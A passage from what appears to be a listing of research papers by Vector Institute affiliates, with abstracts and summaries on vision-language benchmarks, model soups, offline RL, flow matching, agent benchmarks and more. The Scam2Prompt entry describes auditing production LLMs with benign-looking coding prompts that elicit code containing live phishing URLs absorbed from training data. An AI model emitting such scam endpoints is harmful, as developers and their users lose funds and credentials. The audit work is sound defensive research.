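        # The full state is returned only when the observation is triggered.
        return self.state if observed else None

def rollout(env, actions):
    """Split a list of actions into segments that each end with an observation."""
    segments, current = [], []
    for action in actions:
        current.append(action)
        obs = env.step(action)
        if obs is not None:
            segments.append((tuple(current), obs))
            current = []
    # Actions taken since the last observation remain pending.
    return segments, tuple(current)

env = ActionTriggeredEnv(n_states=5, observe_prob={0: 1.0, 1: 0.0})
segments, pending = rollout(env, [1, 1, 0, 1, 0])
```

Here action 0 always reveals the state and action 1 never does, so the rollout splits into two committed action sequences, each ending at an observed state.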
ReVSI: Rebuilding Visual Spatial Intelligence Evaluation for Accurate Assessment of VLM 3D Reasoning
Yiming Zhang, Jiacheng Chen, Jiaqi Tan, Yongsen Mao, Wenhu Chen (Vector Faculty Member), Angel X Chang
Abstract
Current evaluations of spatial intelligence can be systematically invalid under modern vision-language model (VLM) settings. First, many benchmarks derive question-answer (QA) pairs from point-cloud-based 3D annotations originally curated for traditional 3D perception. When such annotations are treated as ground truth for video-based evaluation, reconstruction and annotation artifacts can miss objects that are clearly visible in the video, mislabel object identities, or corrupt geometry-dependent answers (e.g., size), yielding incorrect or ambiguous QA pairs. Second, evaluations often assume full-scene access, while many VLMs operate on sparsely sampled frames (e.g., 16-64), making many questions effectively unanswerable under the actual model inputs. We improve evaluation validity by introducing ReVSI, a benchmark and protocol that ensures each QA pair is answerable and correct under the model’s actual inputs. To this end, we re-annotate object labels and geometry across 413 scenes from 5 datasets to improve data quality, and regenerate all QA pairs with rigorous bias mitigation and human verification using professional 3D visualization and annotation tools. We further enhance evaluation controllability by providing variants across multiple frame budgets (16/32/64/all) and fine-grained object visibility metadata, enabling controlled diagnostic analyses. Evaluations of general and domain-specific VLMs on ReVSI reveal systematic failure modes that are obscured by prior benchmarks, yielding a more reliable and diagnostic assessment of spatial intelligence.
Summary
Vision-language models are increasingly expected to answer questions about videos that require understanding 3D spaces, such as how many chairs are in a room or how far one object is from another. However, evaluating this ability is harder than it may seem: in prior work such as VSI-Bench, some questions rely on incorrect scene information or ask about objects that are not actually visible to the model. In this work, we rebuild VSI-Bench into a more reliable benchmark for visual spatial intelligence, ensuring that each question is supported by the visual evidence available to the model. Our benchmark, ReVSI, corrects object and room annotations across 381 real indoor scenes, regenerates questions with human verification, and provides evaluation settings for different numbers of video frames. We also design controlled tests that remove task-relevant visual evidence to examine whether models truly use the video or instead rely on guesses from common indoor scenes. ReVSI shows that some previous conclusions about model performance were misleading. More broadly, our work provides a more reliable way to measure whether vision-language models can reason about 3D spaces, which is important for future applications in robotics, video understanding, and embodied AI.
TLDR: We identify critical evaluation pitfalls in video-based 3D spatial reasoning benchmarks and propose a visibility-aware, frame-budgeted benchmark for more reliable VLM evaluation.
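To make the frame-budget idea concrete, here is a small sketch of checking whether a question is answerable from the frames a model actually receives. The uniform sampling rule, the function names, and the visibility dictionary format are assumptions for illustration; the benchmark's real protocol and metadata schema may differ.

```python
import numpy as np

def sample_frames(total_frames, budget):
    """Pick up to `budget` frame indices spread uniformly over the video."""
    count = min(budget, total_frames)
    return np.linspace(0, total_frames - 1, num=count).round().astype(int).tolist()

def is_answerable(required_objects, visibility, frames):
    """A question counts as answerable only if every object it needs appears in a sampled frame."""
    seen = set(frames)
    return all(seen & set(visibility.get(obj, ())) for obj in required_objects)

# Hypothetical visibility metadata: object name -> frame indices where it is visible.
visibility = {"chair": [5, 6, 7], "lamp": [50, 51]}

frames_16 = sample_frames(total_frames=100, budget=16)
frames_all = sample_frames(total_frames=100, budget=100)

chair_only = is_answerable(["chair"], visibility, frames_16)
chair_and_lamp = is_answerable(["chair", "lamp"], visibility, frames_16)
chair_and_lamp_all = is_answerable(["chair", "lamp"], visibility, frames_all)
```

With 16 frames the lamp never lands in a sampled frame, so a question that depends on it would be filtered out at that budget but kept when all frames are available.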
Scaling-Aware Adapter for Structure-Grounded LLM Reasoning
Zihao Jing, Qiuhao Zeng, Ruiyi Fang, Yan Li, Yan Sun, Boyu Wang (Vector Faculty Affiliate), Pingzhao Hu
Abstract
Large language models (LLMs) are enabling reasoning over 2D and 3D structures, yet existing methods remain modality-specific and typically compress structural inputs through sequence-based tokenization or fixed-length query connectors. Such architectures either omit the geometric grounding requisite for mitigating structural hallucinations, or impose inflexible modality fusion bottlenecks that concurrently over-compress and suboptimally allocate structural tokens, thereby impeding the realization of generalized all-atom reasoning. We introduce **Cuttlefish**, a unified multimodal LLM that grounds language reasoning in geometric cues while scaling modality tokens with structural complexity. First, **Scaling-Aware Patching** leverages an instruction-conditioned gating mechanism to generate variable-size patches over structural graphs, adaptively scaling the query token budget with structural complexity to mitigate fixed-length connector bottlenecks. Second, **Geometry Grounding Adapter** refines these adaptive tokens via cross-attention to modality embeddings and injects the resulting modality tokens into the LLM, exposing explicit geometric cues to reduce structural hallucination. Experiments across interdisciplinary all-atom benchmarks demonstrate that Cuttlefish achieves superior performance in heterogeneous structure-grounded reasoning. Code: github.com/zihao-jing/Cuttlefish.
Summary
Large language models are increasingly expected to reason beyond plain text, including over objects, systems, and structures with complex spatial or relational information. However, most existing methods still convert these inputs into fixed or simplified representations. This can discard important details, especially when the input size varies greatly, and may cause the model to generate explanations that are not grounded in the actual structure.
This paper introduces Cuttlefish, a framework that helps language models reason over structured inputs more reliably. Instead of forcing every input into the same fixed token budget, Cuttlefish dynamically allocates more tokens to more complex structures and fewer tokens to simpler ones. It also injects explicit structural evidence into the language model, so the model’s responses are better tied to the input rather than inferred from text patterns alone.
In simple terms, Cuttlefish gives language models a more flexible and evidence-grounded way to understand complex structures. This improves their ability to reason over variable-sized structured data and reduces unsupported or hallucinated explanations.
TLDR: Cuttlefish enables LLMs to reason over complex variable-size structures by adaptively allocating tokens and grounding responses in explicit structural evidence.
Scaling Generative Verifiers For Natural Language Mathematical Proof Verification And Selection
Sadegh Mahdavi, Branislav Kisacanin, Shubham Toshniwal, Wei Du, Ivan Moshkov, George Armstrong, Renjie Liao (Vector Faculty Member), Christos Thrampoulidis, Igor Gitman
Abstract
Large language models have achieved remarkable success on final-answer mathematical problems, largely due to the ease of applying reinforcement learning with verifiable rewards. However, the reasoning underlying these solutions is often flawed. Advancing to rigorous proof-based mathematics requires reliable proof verification capabilities. We begin by analyzing multiple evaluation setups and show that focusing on a single benchmark can lead to brittle or misleading conclusions. To address this, we evaluate both proof-based and final-answer reasoning to obtain a more reliable measure of model performance. We then scale two major generative verification methods (GenSelect and LLM-as-a-Judge) to millions of tokens and identify their combination as the most effective framework for solution verification and selection. We further show that the choice of prompt for LLM-as-a-Judge significantly affects the model’s performance, but reinforcement learning can reduce this sensitivity. However, despite improving proof-level metrics, reinforcement learning does not enhance final-answer precision, indicating that current models often reward stylistic or procedural correctness rather than mathematical validity. Our results establish practical guidelines for designing and evaluating scalable proof-verification and selection systems.
Summary
AI systems are becoming very good at finding final answers to math problems, but a right answer can still be backed by a faulty explanation. This matters because advanced mathematics, such as olympiad-style problems, requires a proof that every step is logically sound. In this work, we study how to automatically check and select AI-generated mathematical proofs. We find that judging proofs using only one benchmark can be misleading, because AI checkers may learn shortcuts from the dataset instead of truly checking the math. To address this, we evaluate proof checkers using both full proof correctness and final-answer correctness. We also study two ways of using extra computing effort: comparing candidate proofs against each other and asking an AI judge to score individual proofs several times. The best practical strategy combines these ideas, first narrowing down candidates through comparisons and then using repeated judging to choose the final proof. Training the judge with reinforcement learning makes it less sensitive to prompt wording, but does not reliably improve its ability to check the underlying mathematics. Our results provide guidance for building better mathematical proof checkers, while showing that human review is still important for difficult or high-stakes proofs.
TLDR: We study LLM-based verification and selection methods for natural language mathematical proof generation.
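The two-stage strategy described in the summary (narrow candidates through comparisons, then pick a final proof by repeated judging) can be sketched as follows. This is a simplified illustration, not the paper's pipeline: `compare` and `judge` are hypothetical callables standing in for LLM calls, and the knockout bracket and mean-score rule are assumptions.

```python
def select_proof(candidates, compare, judge, keep=2, judge_samples=4):
    """Narrow candidates by pairwise comparison, then choose by averaged judge scores.

    compare(a, b) returns the preferred candidate; judge(p) returns a numeric score.
    """
    pool = list(candidates)
    # Stage 1: knockout rounds until at most `keep` candidates remain.
    while len(pool) > keep:
        next_pool = [compare(pool[i], pool[i + 1]) for i in range(0, len(pool) - 1, 2)]
        if len(pool) % 2 == 1:
            next_pool.append(pool[-1])  # an unpaired candidate advances unchanged
        pool = next_pool

    # Stage 2: score each survivor several times and average, to smooth judge noise.
    def mean_score(proof):
        return sum(judge(proof) for _ in range(judge_samples)) / judge_samples

    return max(pool, key=mean_score)

# Deterministic stand-ins for the model calls: longer strings count as "better".
def prefer_longer(a, b):
    return a if len(a) >= len(b) else b

best = select_proof(["a", "bbb", "cc", "dddd", "e"], prefer_longer, judge=len)
```

Comparisons are cheap ways to discard weak candidates, while repeated judging spends extra compute only on the few that survive.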
Scam2Prompt: A Scalable Framework for Auditing Malicious Scam Endpoints in Production LLMs
Zhiyang Chen, Tara Saba, Xun Deng, Xujie Si (Vector Faculty Affiliate), Fan Long
Abstract
The insatiable demand for web-scale training data has exposed LLMs to a subtle but consequential threat: the absorption of malicious scam content into model weights and its subsequent reproduction during inference. In November 2024, this risk materialized when a developer reportedly lost 2,500 USD after ChatGPT generated an otherwise routine cryptocurrency trading script containing a live phishing URL. To systematically investigate this problem, we introduce Scam2Prompt, an automated auditing framework that crawls known scam websites, infers their functional intent, and synthesizes innocuous developer-style prompts — the kind of legitimate coding requests a programmer might naturally submit — to evaluate whether LLMs reproduce the underlying scam endpoints. Importantly, our approach requires neither jailbreaking nor adversarial prompting; all 1,377 prompts in our benchmark, Innoc2Scam-bench, which is automatically constructed by Scam2Prompt, were human-validated as benign coding tasks. Evaluation of seven production LLMs released in 2025 on Innoc2Scam-bench shows that the vulnerability proves both persistent and severe: malicious code generation rates range from 12.9% to 47.3% across the evaluated models, and no tested model proves immune. State-of-the-art guardrails and RAG-based agents offer only limited protection, underscoring an urgent need for explicit URL validation in LLM-assisted software development pipelines.
Summary
AI coding assistants now write a huge share of the world’s software, but they learn from the open internet — a place packed with scams. In November 2024, a developer lost 2,500 USD after ChatGPT generated a cryptocurrency trading script that quietly sent his wallet’s private key to a phishing website. How widespread is this problem, and which AI assistants are affected? We built Scam2Prompt, an automated detective that hunts for scam links hidden inside popular AI coding tools. Our system writes the kind of innocent coding question any programmer might naturally ask — but on topics that scammers crowd too, like flight booking, coupons, and digital currencies — then checks whether the AI’s answer secretly contains a link to a scam site. No tricks or jailbreaking required. We tested seven of the newest AI assistants from major companies including GPT-5 and Gemini 2.5 Pro. Every single one produced code laced with scam URLs, between 13% and 47% of the time. Along the way, our tool uncovered 62 previously unknown live phishing websites that had quietly lurked inside the AI’s “memory” for over a year, evading conventional security tools. We released our benchmark publicly so the community can measure progress on fixing this industry-wide blind spot.
TLDR: Scam2Prompt automatically audits LLMs by synthesizing developer-style prompts that trigger LLMs to generate malicious code with scam URLs. A curated subset of prompts can still trigger high malicious code generation rates across 7 SOTA LLMs in 2025.
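The explicit URL validation called for above could take many forms. One minimal sketch, assuming a host allowlist is available, scans generated code for URLs and flags any whose host is not approved. The regular expression, function name, and example hosts are hypothetical, and a real pipeline would likely combine this with reputation or threat-intelligence checks.

```python
import re
from urllib.parse import urlparse

# Simple pattern for http(s) URLs embedded in source code (an assumption, not exhaustive).
URL_PATTERN = re.compile(r"https?://[^\s'\"<>)\]]+")

def find_unapproved_urls(generated_code, allowed_hosts):
    """Return URLs in the code whose host is neither allowlisted nor a subdomain of an allowlisted host."""
    flagged = []
    for url in URL_PATTERN.findall(generated_code):
        host = (urlparse(url).hostname or "").lower()
        approved = any(host == h or host.endswith("." + h) for h in allowed_hosts)
        if not approved:
            flagged.append(url)
    return flagged

snippet = (
    'price = requests.get("https://api.example.com/v1/price")\n'
    'requests.post("http://wallet-sync.invalid/key", data=secret)\n'
)
flagged = find_unapproved_urls(snippet, allowed_hosts={"example.com"})
```

An allowlist is deliberately conservative: it flags unknown endpoints for review rather than trying to recognize scams directly.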
Segmentation From Attention: Training-Free Layer Selection and One-Shot Tuning for Segmentation in VLMs
Mir Rayat Imtiaz Hossain, Mennatullah Siam, Leonid Sigal (Vector Faculty Member), James Little
Abstract
Large-scale vision-language models (VLMs), trained on extensive datasets of image-text pairs, exhibit strong multimodal understanding capabilities by implicitly learning associations between textual descriptions and image regions. This emergent ability enables zero-shot object detection and segmentation, using techniques that rely on text-image attention maps, without necessarily training on abundant labeled segmentation datasets. However, the performance of such methods depends heavily on prompt engineering and on manually selected layers or heads for the attention layers. In this work, we propose a training-free entropy-based measure, InfoScore, to identify the best image-text attention layers for segmentation, providing a more flexible and scalable solution for training-free open-vocabulary segmentation and reducing the additional burden of hyperparameter search. We empirically show that our training-free selection strategy is superior to naive selection strategies. Additionally, we demonstrate that instead of solely relying on text prompts, fine-tuning the image-text attention layer with a single visual example of each class significantly improves segmentation without the need for additional parameters or decoders. Moreover, we show that our methods and findings are general and can be applied across various VLMs.
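The abstract does not define InfoScore, so the following is only a generic sketch of entropy-based layer selection, not the paper's measure. It assumes each layer provides one non-negative text-to-image attention map and that a lower Shannon entropy (more concentrated attention) indicates a better layer for localization; both the criterion and the function names are hypothetical.

```python
import numpy as np

def attention_entropy(attn):
    """Shannon entropy of an attention map after normalizing it to sum to one."""
    p = attn.reshape(-1).astype(np.float64)
    p = p / p.sum()
    nonzero = p[p > 0]
    return float(-(nonzero * np.log(nonzero)).sum())

def pick_layer(attn_maps):
    """Return the index of the lowest-entropy map and the entropy of every map."""
    entropies = [attention_entropy(a) for a in attn_maps]
    return int(np.argmin(entropies)), entropies

# Two toy 4x4 maps: one spread evenly over the image, one focused on a single patch.
uniform_map = np.ones((4, 4))
peaked_map = np.zeros((4, 4))
peaked_map[1, 2] = 1.0

best_layer, entropies = pick_layer([uniform_map, peaked_map])
```

Because the score needs only attention maps from a forward pass, a selection rule of this kind requires no labels and no gradient updates.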
Self-Soupervision: Cooking Model Soups without Labels
Spotlight paper
Anthony Fuller, James Green, Evan Shelhamer (Vector Faculty Member)
Abstract
Model soups are strange and strangely effective combinations of parameters. They take a model (the stock), fine-tune it into multiple models (the ingredients), and then mix their parameters back into one model (the soup) to improve predictions. While all known soups require supervised learning, and optimize the same loss on labeled data, our recipes for Self-Soupervision generalize soups to self-supervised learning (SSL). Our Self-Souping lets us flavor ingredients on new data sources, e.g. from unlabeled data from a task for transfer or from a shift for robustness. We show that Self-Souping on corrupted test data, then fine-tuning back on uncorrupted train data, boosts robustness by +3.5% (ImageNet-C) and +7% (LAION-C). Self-Soupervision also unlocks countless SSL algorithms to cook the diverse ingredients needed for more robust soups. We show for the first time that ingredients can differ in their SSL hyperparameters—and more surprisingly, in their SSL algorithms. We cook soups of MAE, MoCoV3, MMCR, and LeJEPA ingredients that are more accurate than any single SSL ingredient.
Summary
We create machine-learning models by training them to recognize things in images by giving them many image-annotation pairs. The learned algorithm, which does the recognizing, is a set of weights that perform mathematical operations on the input image to make an output-annotation prediction. Combining the weights of many models into a single model is called a model soup, which can perform better than any of the models that went into it—called ingredients—without increasing the cost of making predictions because the number of mathematical operations is not changed.
In our work, we make model soups by combining ingredient models that we train without annotations. We make these ingredients without annotations in different ways, for example, training a model to predict hidden patches or to represent the same image in the same way regardless of its color or orientation. Our work makes model soups more general since we no longer need human-annotated datasets to create ingredients and soups.
TLDR: Our Self-Soupervision generalizes model soups to self-supervised learning for improved robustness.
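For readers new to model soups, the mixing step can be sketched as a plain average of parameters. This shows uniform averaging, one common recipe, and is not necessarily the mixing rule used in the paper; the parameter dictionaries and the function name `uniform_soup` are hypothetical.

```python
import numpy as np

def uniform_soup(ingredients):
    """Average each named parameter across ingredient models with identical shapes."""
    keys = ingredients[0].keys()
    return {k: np.mean([ing[k] for ing in ingredients], axis=0) for k in keys}

# Two toy ingredients fine-tuned from the same stock model.
ingredient_a = {"w": np.array([1.0, 3.0]), "b": np.array([0.0])}
ingredient_b = {"w": np.array([3.0, 5.0]), "b": np.array([2.0])}

soup = uniform_soup([ingredient_a, ingredient_b])
```

The soup has the same shape as each ingredient, which is why inference cost does not grow with the number of ingredients.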
SMAC: Score-Matched Actor-Critics for Robust Offline-to-Online Transfer
Nathan S. de Lara, Florian Shkurti (Vector Faculty Member)
Abstract
Modern offline Reinforcement Learning (RL) methods find performant actor-critics; however, fine-tuning these actor-critics online with value-based RL algorithms typically causes immediate drops in performance. We provide evidence consistent with the hypothesis that, in the loss landscape, offline maxima for prior algorithms and online maxima are separated by low-performance valleys that gradient-based fine-tuning traverses. Following this, we present Score-Matched Actor-Critic (SMAC), an offline RL method designed to learn actor-critics that transition to online value-based RL algorithms with no drop in performance. SMAC avoids valleys between offline and online maxima by regularizing the Q-function during the offline phase to respect a first-order derivative equality between the score of the policy and the action-gradient of the Q-function. We experimentally demonstrate that SMAC converges to offline maxima that are connected to better online maxima via paths with monotonically increasing reward found by first-order optimization. SMAC achieves smooth transfer to Soft Actor-Critic and TD3 in 6/6 D4RL tasks. In 4/6 environments, it reduces regret by 34-58% over the best baseline.
Summary
This paper studies a practical problem in reinforcement learning: how to take a policy trained from old, offline data and safely improve it through new online experience.
Offline reinforcement learning can learn strong policies without interacting with the environment, which is useful when real-world interaction is expensive or risky. But when these offline-trained agents are later fine-tuned online with standard RL algorithms, they often get worse before they get better. That early performance drop is dangerous in settings like robotics, where a bad policy during fine-tuning can cause real failures.
The paper argues that this drop happens because many offline RL methods find solutions that are good on their own, but poorly positioned for online fine-tuning. In the space of neural network parameters, the offline solution and the online solution may be separated by a low-performance region. So when gradient-based fine-tuning moves from one to the other, the agent temporarily passes through a bad policy.
The proposed method, Score-Matched Actor-Critic (SMAC), tries to train offline agents that are not just good initially, but also easier for online RL algorithms to keep improving. It does this by shaping the critic so that its action preferences resemble the structure expected by online actor-critic methods like SAC. In simpler terms, SMAC trains the value function to point the policy toward actions that look both data-supported and compatible with later online learning.
Across several benchmark tasks, SMAC avoids the sharp performance drops seen in prior offline RL methods. It fine-tunes smoothly with SAC and TD3, and often achieves much lower online regret, meaning it wastes fewer online interactions performing poorly. The broader message is that offline RL should not only optimize for the best offline checkpoint; it should optimize for checkpoints that sit on a good path toward future online improvement.
TLDR: Offline RL fine-tuning fails because offline and online optima are disconnected in the loss landscape. SMAC uses score-matching regularization on the Q-function to ensure connectivity, enabling smooth transfer to online algorithms.
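One way to read the relation between the policy score and the action-gradient of the Q-function: under the maximum-entropy form used by Soft Actor-Critic, a policy that is optimal for a fixed critic satisfies $\pi(a\mid s)\propto\exp(Q(s,a)/\alpha)$. Taking the log and differentiating with respect to the action removes the normalizer $Z(s)$, which does not depend on $a$. The temperature $\alpha$ and this specific form are assumptions for illustration; the exact regularizer used by SMAC is not stated here.

$$
\log \pi(a\mid s) = \frac{1}{\alpha}\,Q(s,a) - \log Z(s)
\quad\Longrightarrow\quad
\nabla_a \log \pi(a\mid s) = \frac{1}{\alpha}\,\nabla_a Q(s,a).
$$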
SparseOpt: Addressing Normalization-induced Gradient Skew in Sparse Training
Adnan Mohammed, Rohan Jain, Tom Jacobs, Ekansh Sharma, Rahul G. Krishnan (Vector Faculty Member), Rebekka Burkholz, Yani Ioannou
Abstract
Dynamic Sparse Training (DST) methods train neural networks by maintaining sparsity while dynamically adapting the network topology. Despite the promise of reduced computation, DST methods converge significantly slower than dense training, often requiring comparable training time to achieve similar accuracy. We demonstrate both analytically and empirically that Batch Normalization (BN) adversely affects sparse training, and propose SparseOpt — a sparsity-aware optimizer — to address this. Experiments on ResNet models across CIFAR-100 and ImageNet demonstrate consistently faster convergence and improved generalization with our proposed method. Our work highlights the limitations of current normalization layers in sparse training and provides the first systematic study of the interaction between Batch Normalization, sparse layers, and DST, taking a significant step toward making DST practically competitive with dense training.
Summary
Sparse training aims to train neural networks using only a small fraction of the connections, instead of using every parameter in the network. Since fewer connections are active, sparse training has the potential to significantly reduce the computational and memory cost of training large models. However, in practice, sparse neural networks are much harder to train than standard dense networks. Existing sparse training methods often converge substantially slower and may require significantly longer training schedules to match the accuracy of dense models, limiting their practical efficiency benefits.
To stabilize and accelerate the training of deep neural networks, modern architectures almost universally rely on normalization layers such as Batch Normalization (BN). Intuitively, BN keeps activations and gradients well-scaled during training, which helps optimization remain stable and enables faster convergence. While BN has been extensively studied in dense neural networks, prior work largely assumed that it behaves similarly in sparse networks. In this work, we show both theoretically and empirically that this assumption does not hold. Specifically, we demonstrate that BN interacts poorly with heterogeneous sparse connectivity, leading to neuron-dependent gradient scaling that distorts optimization dynamics and destabilizes Dynamic Sparse Training (DST).
Motivated by this observation, we propose a simple sparsity-aware correction method, SparseOpt, that accounts for the gradient imbalance introduced by BN. Our method improves optimization stability, accelerates convergence, and consistently improves sparse training performance across multiple datasets and architectures.
TLDR: Batch Normalization adversely affects sparse training; we propose a sparsity-aware optimization method that mitigates this and improves training convergence and generalization.
Stable Velocity: A Variance Perspective on Flow Matching
Donglin Yang, Yongxing Zhang, Xin Yu, Liang Hou, Xin Tao, Pengfei Wan, Xiaojuan Qi, Renjie Liao (Vector Faculty Member)
Abstract
While flow matching is elegant, its reliance on single-sample conditional velocities leads to high-variance training targets that destabilize optimization and slow convergence. By explicitly characterizing this variance, we identify 1) a *high-variance regime* near the prior, where optimization is challenging, and 2) a *low-variance regime* near the data distribution, where conditional and marginal velocities nearly coincide. Leveraging this insight, we propose **Stable Velocity**, a unified framework that improves both training and sampling. For training, we introduce Stable Velocity Matching (StableVM), an unbiased variance-reduction objective, along with Variance-Aware Representation Alignment (VA-REPA), which adaptively strengthens auxiliary supervision in the *low-variance regime*. For inference, we show that dynamics in the *low-variance regime* admit closed-form simplifications, enabling Stable Velocity Sampling (StableVS), a finetuning-free acceleration. Extensive experiments on ImageNet $256\times256$ and large pretrained text-to-image and text-to-video models, including SD3.5, Flux, Qwen-Image, and Wan2.2, demonstrate consistent improvements in training efficiency and more than $2\times$ faster sampling within the *low-variance regime* without degrading sample quality. Our code is available at https://github.com/linYDTHU/StableVelocity.
Summary
Modern generative models can create high-quality images and videos, but training them efficiently remains challenging. One reason is that the learning signals they rely on can be very noisy, especially in the early stages of generation, which makes training unstable and slow.
In this work, we analyze where this noise comes from and show that it is much higher when the model starts from random inputs, but becomes much lower as the model gets closer to real data. Based on this observation, we propose a new method called Stable Velocity that improves both training and generation.
During training, our method reduces noise in the learning signals and focuses more on the parts of the process that are easier to learn. During generation, we take advantage of simpler dynamics in the low-noise region to speed up sampling without additional training.
Our approach consistently makes training more efficient and can generate images and videos more than twice as fast, while maintaining the same quality.
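The contrast between noisy targets near the prior and clean targets near the data can be checked on a one-dimensional toy problem. The sketch below is not the paper's analysis: it assumes a standard normal prior at $t=0$, data uniform on $\{-1,+1\}$ at $t=1$, and the linear path $x_t=(1-t)x_0+t\,x_1$ with conditional velocity $x_1-x_0$. It compares only two time points and makes no claim about the times in between.

```python
import numpy as np

def mean_conditional_velocity_variance(t, n=20000, seed=0):
    """Average over x_t of Var(x_1 - x_0 | x_t) for the toy problem described above."""
    rng = np.random.default_rng(seed)
    x1 = rng.choice([-1.0, 1.0], size=n)   # data samples
    x0 = rng.normal(size=n)                # prior samples
    s = 1.0 - t
    xt = s * x0 + t * x1
    # Given x_t, the posterior mean of x_1 is tanh(t * x_t / s^2), so the
    # posterior variance of the +/-1 variable is 1 - tanh^2(...).
    var_x1 = 1.0 - np.tanh(t * xt / s**2) ** 2
    # Given x_t, the velocity x_1 - x_0 equals (x_1 - x_t) / s, so its
    # conditional variance is Var(x_1 | x_t) / s^2.
    return float(np.mean(var_x1) / s**2)

near_prior = mean_conditional_velocity_variance(0.05)
near_data = mean_conditional_velocity_variance(0.95)
```

Near the prior, a noisy point is compatible with either data value, so the single-sample target is a noisy estimate of the marginal velocity. Near the data, the posterior collapses onto one value and the conditional and marginal velocities nearly coincide.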
τ²-Bench: Evaluating Conversational Agents in a Dual-Control Environment
Spotlight paper
Victor Barres, Honghua Dong, Soham Ray, Xujie Si (Vector Faculty Affiliate), Karthik Narasimhan
Abstract
Existing benchmarks for conversational AI agents simulate *single-control* environments, where only the AI agent can use tools to interact with the world, while the user remains a passive information provider. This differs from real-world scenarios like technical support, where users need to actively participate in modifying the state of the (shared) world. In order to address this gap, we introduce τ²-bench, with four key contributions:
- A novel **Telecom dual-control domain** modeled as a Dec-POMDP, where both agent and user make use of tools to act in a shared, dynamic environment that tests both agent coordination and communication,
- A **compositional task generator** that programmatically creates diverse, verifiable tasks from atomic components, ensuring domain coverage and controlled complexity,
- A **reliable user simulator** tightly coupled with the environment, whose behavior is constrained by tools and observable states, improving simulation fidelity,
- A **fine-grained analysis of agent performance** through multiple ablations, including separating errors arising from reasoning vs. communication/coordination.
In particular, our experiments show significant performance drops when agents shift from no-user to dual-control, highlighting the challenges of guiding users. Overall, τ²-bench provides a controlled testbed for agents that must both reason effectively and guide user actions.
Summary
Today’s tests for AI customer-service assistants place the AI in a world where only it can take actions, while the user just talks. But in real support — like calling about a broken phone — the user must also act, restarting devices or toggling settings, while the agent guides them. To address this gap, we introduce τ²-bench, with four contributions: 1) a new telecom support task where both the AI and a simulated user can take actions on a shared system; 2) an automatic task generator that builds varied, solvable problems from a small set of reusable building blocks; 3) a user simulator whose actions are kept predictable and consistent with what is actually possible by tying it to the environment rather than prompts alone; and 4) measurements that separate the AI’s reasoning errors from its communication errors. Experiments show that even the best current assistants succeed on only 34–49% of new tasks, with performance dropping about 20% when the AI must guide a user instead of acting alone. τ²-bench gives researchers a way to measure and improve this gap before AI assistants reach customer-facing roles. Code, data, and a leaderboard are at taubench.com.
TLDR: τ²-bench introduces a new way to test AI agents by letting both the agent and a simulated user interact in a shared “telecom” world. This allows for creating diverse, verifiable tasks and better user simulation.
Talk, Judge, Cooperate: Gossip-Driven Indirect Reciprocity in Self-Interested LLM Agents
Shuhui Zhu, Yue Lin, Shriya Kaistha, Wenhao Li, Baoxiang Wang, Hongyuan Zha, Gillian Hadfield (Vector Faculty Member), Pascal Poupart (Vector Faculty Member)
Abstract
Indirect reciprocity, which means helping those who help others, is difficult to sustain among decentralized, self-interested LLM agents without reliable reputation systems. We introduce Agentic Linguistic Gossip Network (ALIGN), an automated framework where agents strategically share open-ended gossip using hierarchical tones to evaluate trustworthiness and coordinate social norms. We demonstrate that ALIGN consistently improves indirect reciprocity and resists malicious entrants by identifying and ostracizing defectors without changing intrinsic incentives. Notably, we find that stronger reasoning capabilities in LLMs lead to more incentive-aligned cooperation, whereas chat models often over-cooperate even when strategically suboptimal. These results suggest that leveraging LLM reasoning through decentralized gossip is a promising path for maintaining social welfare in agentic ecosystems.
Summary
As large language model agents begin to represent different users, companies, or institutions, their interests may not always be aligned. In partially conflicting scenarios, agents may act in their own interest, which can make cooperation difficult: an agent may benefit from taking help without helping others in return.
This paper studies whether public gossip can help address this problem. We introduce ALIGN, a framework where agents can broadcast public messages about how others behaved, such as praising helpful behavior or criticizing selfish behavior. These messages help agents build reputations and decide whom to trust in future interactions.
Across several simulated environments, we find that public gossip can help self-interested language-model agents cooperate more and achieve better outcomes, without directly changing their rewards or forcing them to be altruistic. The system can also reduce harm from selfish or malicious agents by spreading negative reports about repeated bad behavior. Our results suggest that open-ended language can serve as an adaptive reputation mechanism for future multi-agent AI systems, while also highlighting the need for safeguards against false gossip, unfair exclusion, and misuse of reputation systems.
TLDR: ALIGN enables self-interested LLM agents to sustain indirect reciprocity through open-ended public gossip that transmits reputational signals.
Temporal Straightening for Latent Planning
Ying Wang, Oumayma Bounou, Gaoyue Zhou, Randall Balestriero, Tim G. J. Rudner (incoming Vector Faculty Member), Yann LeCun, Mengye Ren
Abstract
Learning good representations is essential for latent planning with world models. While pretrained visual encoders produce strong semantic visual features, they are not tailored to planning and contain information irrelevant, or even detrimental, to planning. Inspired by the perceptual straightening hypothesis in human visual processing, we introduce temporal straightening to improve representation learning for latent planning. Using a curvature regularizer that encourages locally straightened latent trajectories, we jointly learn an encoder and a predictor of a Joint-Embedding Predictive Architecture (JEPA) world model. We show that reducing curvature this way makes the Euclidean distance in latent space a better proxy for the geodesic distance and improves the conditioning of the planning objective. We demonstrate empirically that temporal straightening makes gradient-based planning more stable and yields significantly higher success rates across a suite of goal-reaching tasks. Our code is available at https://agenticlearning.ai/temporal-straightening.
Summary
A world model learns to predict how the world will change given the current state and action, then uses those predictions for planning. However, in many latent world models, the learned representation is not naturally organized for planning and control: trajectories that are feasible in the real environment can become highly curved in latent space, making prediction and planning hard.
TLDR: We introduce temporal straightening to improve representation learning for world modeling and latent planning.
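To make the idea of "curvature" of a latent trajectory concrete, here is a minimal sketch. It is an illustration only, not the authors' regularizer: the function name `curvature_penalty` and the choice of one minus cosine similarity between consecutive latent displacements are assumptions made for this example.

```python
import numpy as np

def curvature_penalty(z, eps=1e-8):
    """Mean (1 - cosine similarity) between consecutive latent displacements.

    z: array of shape (T, d), one latent state per time step, with T >= 3.
    A perfectly straight trajectory gives a value near 0; sharper turns
    give larger values (up to 2 for full reversals).
    NOTE: hypothetical penalty for illustration, not the paper's exact loss.
    """
    z = np.asarray(z, dtype=float)
    v = z[1:] - z[:-1]                      # displacements, shape (T-1, d)
    norms = np.linalg.norm(v, axis=1)       # length of each displacement
    cos = np.sum(v[:-1] * v[1:], axis=1) / (norms[:-1] * norms[1:] + eps)
    return float(np.mean(1.0 - cos))

# A straight line versus a staircase with right-angle turns.
straight = np.outer(np.arange(5), [1.0, 2.0])
zigzag = np.array([[0, 0], [1, 0], [1, 1], [2, 1], [2, 2]], dtype=float)

print(curvature_penalty(straight))  # close to 0
print(curvature_penalty(zigzag))    # close to 1 (every turn is 90 degrees)
```

In a training setup, a term of this kind would be added to the prediction loss so that the encoder is encouraged to produce locally straight trajectories.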
Test-Time Graph Search for Goal-Conditioned Reinforcement Learning
